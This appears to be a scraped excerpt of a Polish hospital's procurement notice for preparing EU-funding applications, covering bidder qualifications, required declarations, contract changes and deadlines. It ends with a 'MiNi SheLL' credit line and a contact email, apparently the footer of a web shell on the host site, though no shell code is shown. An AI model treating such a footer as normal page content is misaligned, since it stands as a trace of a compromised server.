class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 3.3 Sytuacja ekonomiczna lub finansowa:<br/>Wykonawca musi wykazać, że że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>związanej z przedmiotem zamówienia na kwotę minimum: 1 mln zł (słownie: jeden milion złotych<br/>00/100) ważną na dzień złożenia oferty.<br/>3.4 Zdolność techniczna lub zawodowa:<br/>W zakresie zdolności technicznej i zawodowej Zamawiający określa jeden warunek udziału w postępowaniu,<br/>Warunek zostanie spełniony, jeżeli: a) Wykonawca wykaże, że dysponuje lub będzie dysponować w okresie wykonywania<br/>zamówienia i skieruje do jego realizacji minimum 2 osoby (zespół wykonawcy), które będą uczestniczyćw wykonaniu<br/>przedmiotowego zamówienia. Osoby te pełnić winny niżej wymienione funkcje oraz legitymować się następującym<br/>doświadczeniem:<br/>Koordynator zespołu - co najmniej 5-letnie doświadczenie w przygotowaniu dokumentacji<br/>aplikacyjnej dla konkursów z dofinansowaniem UE na realizację projektów infrastrukturalnych dla podmiotów leczniczych, o wartości nie niższej niż 3 mln zł za projekt w tym co najmniej 3 kompletne dokumentacje aplikacyjne spełniające wymagania formalno- merytoryczne właściwej instytucji (w tym m.in. opis projektu, budżet, wskaźniki, studium wykonalności/ analizy,<br/>zgodność z zasadą DNSH i inne), dla projektów ze środków publicznych o porównywalnych wymaganiach formalnych (w szczególności FESL/FERS/EFRR, programy regionalne, RRF/KPO), które uzyskały dofinansowanie.<br/>Członek zespołu - co najmniej 5-letnie doświadczenie w przygotowaniu dokumentacji aplikacyjnej dla konkursów z dofinansowaniem UE na realizację<br/>projektów infrastrukturalnych dla podmiotów leczniczych, o wartości nie niższej niż 1 mln zł za projekt w tym co najmniej 2 kompletne dokumentacje aplikacyjne spełniające wymagania formalno- merytoryczne właściwej instytucji (w tym m.in. opis projektu, budżet, wskaźniki, studium wykonalności/ analizy, zgodność z zasadą DNSH i inne), dla projektów ze środków publicznych o porównywalnych wymaganiach formalnych (w<br/>szczególności FESL/FERS/EFRR, programy regionalne, RRF/KPO),<br/>które uzyskały dofinansowanie regionalne, RRF/KPO), które<br/>uzyskały dofinansowanie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty:a) aktualne na dzień składania ofert: Oświadczenie o braku podstaw do wykluczenia i o spełnianiu warunków udziału w postępowaniu, wg wzoru stanowiącego załącznik nr 3 do SWZ. Oświadczenie stanowi dowód potwierdzający brak podstaw wykluczenia na dzień składania ofert. Oświadczenie składa się, pod rygorem nieważności, w formie elektronicznej (w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. 2) Wykonawca, który powołuje się na zasoby innych podmiotów, winien załączyć dowód potwierdzający, że realizując zamówienie<br/>będzie dysponował niezbędnymi zasobami innych podmiotów, który stanowi<br/>w szczególności zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienia, będzie dysponował niezbędnymi zasobami tych podmiotów, wg wzoru stanowiącego zał nr 5 do SWZ Zobowiązanie podmiotu udostępniającego zasoby, potwierdza, że stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych<br/>zasobów oraz określa w szczególności: a) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby; b) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia; c) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi,<br/>których wskazane zdolności dotyczą. w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu składa także oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu dotyczące tych podmiotów<br/><br/>3. Na wezwanie zamawiającego wykonawca musi przedłożyć:<br/>3.1 Oświadczenia lub dokumenty potwierdzające brak podstaw wykluczenia Wykonawcy z udziału w postępowaniu (składane na<br/>wezwanie amawiającego): 􀀀 oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, w zakresie podstaw<br/>wykluczenia z postępowania wskazanych przez zamawiającego, zgodnego z wzorem stanowiącym załącznik nr 7 do SWZ; 􀀀<br/>oświadczenie wykonawcy, o braku przynależności do tej samej grupy kapitałowej , z innym wykonawcą, który złożył odrębną ofertę,<br/>albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej, zgodnego z<br/>wzorem stanowiącym załącznik nr 8 do SWZ. W przypadku złożenia do niniejszego postępowania jednej oferty Zamawiający odstąpi<br/>od wzywania wykonawcy do złożenia dokumentu, o którym mowa powyżej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Dokument potwierdzający, że Wykonawca jest ubezpieczony ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej<br/>działalności z sumą ubezpieczenia minimum 1 mln zł (słownie: jeden milion złotych<br/>00/100<br/>Treść dokumentu musi potwierdzać spełnienie warunku, o którym mowa w Rozdziale VI pkt 3.3) SWZ.<br/>Wykaz osób, zgodny z wzorem stanowiącym załącznik nr 9 do SWZ, skierowanych przez Wykonawcę do realizacji zamówienia<br/>publicznego wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,<br/>doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami Treść zawarta w wykazie musi potwierdzać spełnienie<br/>warunku, o którym mowa w Rozdziale VI pkt 3.4.a) SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w<br/>zdaniu 1 powyżej, zamawiający wymaga od wykonawcy złożenia oprócz<br/>dokumentu określonego w zdaniu 1 powyżej, pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do<br/>reprezentowania Wykonawcy.<br/>Pełnomocnictwo przekazuje się w postaci elektronicznej i opatruje kwalifikowanym podpisem elektronicznym, podpisem zaufanym<br/>lub podpisem osobistym. W przypadku, gdy pełnomocnictwo zostało wystawione w postaci<br/>papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu,opatrzone kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z<br/>dokumentem w postaci papierowej. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę. 3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zobowiązani się złożyć wraz z ofertą stosowne pełnomocnictwo – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>UWAGA nr 2<br/>Pełnomocnictwo, o którym mowa powyżej może wynikać albo z dokumentu pod taką samą nazwą, albo z umowy Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 4. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących<br/>wspólnie (przez każdego z Wykonawców lub upoważnionego pełnomocnika).<br/>5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy, wg wzoru, stanowiącego (załącznik nr 6 do SWZ).<br/>6. W przypadku wspólnego ubiegania się o udzielenie zamówienie przez Wykonawców oświadczenie, o którym mowa w art. 125 ustawy (załącznik nr 3 do SWZ) składa każdy z Wykonawców wspólnie ubiegających się o<br/>zamówienie. Oświadczenia te potwierdzają spełnianie warunków udziału w postępowaniu w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu, oraz brak podstaw wykluczenia - każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania w oparciu o wskazane w SWZ podstawy wykluczenia. Powyższe oznacza, iż: Oświadczenie w zakresie braku podstaw wykluczenia musi złożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>7. W przypadku wspólnego ubiegania się o udzielenie zamówienie przez Wykonawców oświadczenie, o którym mowa w art. 108 ustawy (załącznik nr 5 do SWZ) składa każdy z Wykonawców wspólnie ubiegających<br/>się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia na podstawie art. 108 ustawy - każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania w oparciu o wskazane w SWZ podstawy wykluczenia. Powyższe oznacza, iż:<br/>Oświadczenie w zakresie braku podstaw wykluczenia na podstawie art. 108 ustwy musi złożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia; 8. Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z projektowanymi postanowieniami umowy stanowiącymi załącznik nr 4 do specyfikacji warunków zamówienia.<br/>Zamawiający dopuszcza wprowadzenie następujących zmian w niniejszej umowie:<br/>1) zmiany terminu realizacji przedmiotu umowy, ze względu na przyczyny leżące po stronie Zamawiającego, o czas który<br/>uniemożliwił Wykonawcy realizację umowy, pomimo dochowania przez niego należytej staranności,<br/>2) zmiany terminu realizacji przedmiotu umowy na skutek wystąpienia okoliczności, za które Wykonawca nie ponosi<br/>odpowiedzialności w tym na skutek działania tzw. siły wyższej, skutkującej niemożnością dotrzymania przez niego terminu<br/>realizacji, określonego w umowie.<br/>Wówczas termin ten może ulec przedłużeniu, nie więcej jednak niż o czas trwania tych okoliczności. Pod pojęciem siły<br/>wyższej Strony rozumieją okoliczności, które pomimo zachowania należytej staranności i podjęcia wszelkich działań w<br/>normalnym zakresie, nie mogą być przez Strony przewidziane oraz którym Strony nie mogą zapobiec, bądź się im<br/>przeciwstawić w sposób skuteczny, 3) zmiany wynikające ze zmian obowiązujących przepisów w zakresie mającym wpływ<br/>na<br/>realizację niniejszej Umowy, 4) zmian zakresu umowy czy wzajemnych obowiązków stron na skutek wystąpienia<br/>okoliczności,<br/>których nie można było przewidzieć w chwili zawarcia Umowy,<br/>5) zmian stron umowy wynikających ze zmiany stanu faktycznego lub prawnego (następstwo prawne);<br/>6) konieczności wprowadzenia zmian dotyczących treści o charakterze informacyjnym lub instrukcyjnym, niezbędnych do<br/>realizacji umowy, w szczególności zmian dotyczących numeru<br/>rachunku bankowego Wykonawcy lub Zamawiającego, zmiany osób upoważnionych do komunikowania się, zmiany osób<br/>odpowiedzialnych za potwierdzenie prawidłowej realizacji umowy wraz z adresami, numerami telefonów, adresami poczty<br/>elektronicznej, itp.,<br/>7) w przypadku, kiedy Wykonawcę, któremu Zamawiający udzielił zamówienia, ma zastąpić nowy Wykonawca:<br/>a) w wyniku połączenia, podziału, przekształcenia, upadłości, restrukturyzacji lub nabycia dotychczasowego Wykonawcy lub<br/>jego przedsiębiorstwa, o ile nowy Wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego<br/>podstawy wykluczenia oraz nie pociąga to za sobą istotnych zmian umowy,<br/>b) w wyniku przejęcia przez Zamawiającego zobowiązań Wykonawcy względem jego podwykonawców.<br/>3. Strony postanawiają, iż dokonają zmiany wysokości wynagrodzenia należnego Wykonawcy w przypadku zmiany stawki<br/>podatku od towarów i usług – przy niezmienności ceny netto.<br/>4. Zmiany określone w ust. 3 obowiązywać będą od pierwszego dnia miesiąca, następującego po miesiącu, w którym weszła<br/>w życie ta zmiana.<br/>5. Zmiany, o których mowa w ust. 2 będą dokonywane na uzasadniony wniosek jednej ze Stron, wraz ze wskazaniem<br/>proponowanego zakresu i podaniem podstawy prawnej zmian. Przewidziane powyżej okoliczności stanowiące podstawę zmian do umowy, stanowią uprawnienie<br/>Zamawiającego nie zaś jego obowiązek. Zmiany takie są możliwe jedynie w przypadku, jeżeli nie wpłyną na wykonanie<br/>umowy w zakresie określonym w Umowie.<br/>6. Zmiana niniejszej umowy jest możliwa jeżeli łączna wartość zmian jest mniejsza niż progi unijne oraz jest niższa niż 10 %<br/>wartości pierwotnej umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-09-26 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z załącznikami należy złożyć za pośrednictwem platformy zakupowej dostępnej pod adresem: https://platformazakupowa.pl/pn/szpital.rybnik</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-09-26 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-10-24</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawcy, a także innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez zamawiającego przepisów ustawy, przysługuje prawo wniesienia środków ochrony prawnej, określonych w przepisach działu IX Ustawy. 2. Wobec ogłoszenia o zamówieniu oraz specyfikacji warunków zamówienia środki ochrony prawnej, przysługują również organizacjom wpisanym na listę organizacji uprawnionych do wnoszenia środków ochrony prawnej, prowadzoną przez Prezesa Urzędu Zamówień Publicznych. 3. Zasady, terminy oraz<br/>sposób korzystania ze środków ochrony prawnej szczegółowo regulują przepisy działu IX Ustawy

Creat By MiNi SheLL
Email: jattceo@gmail.com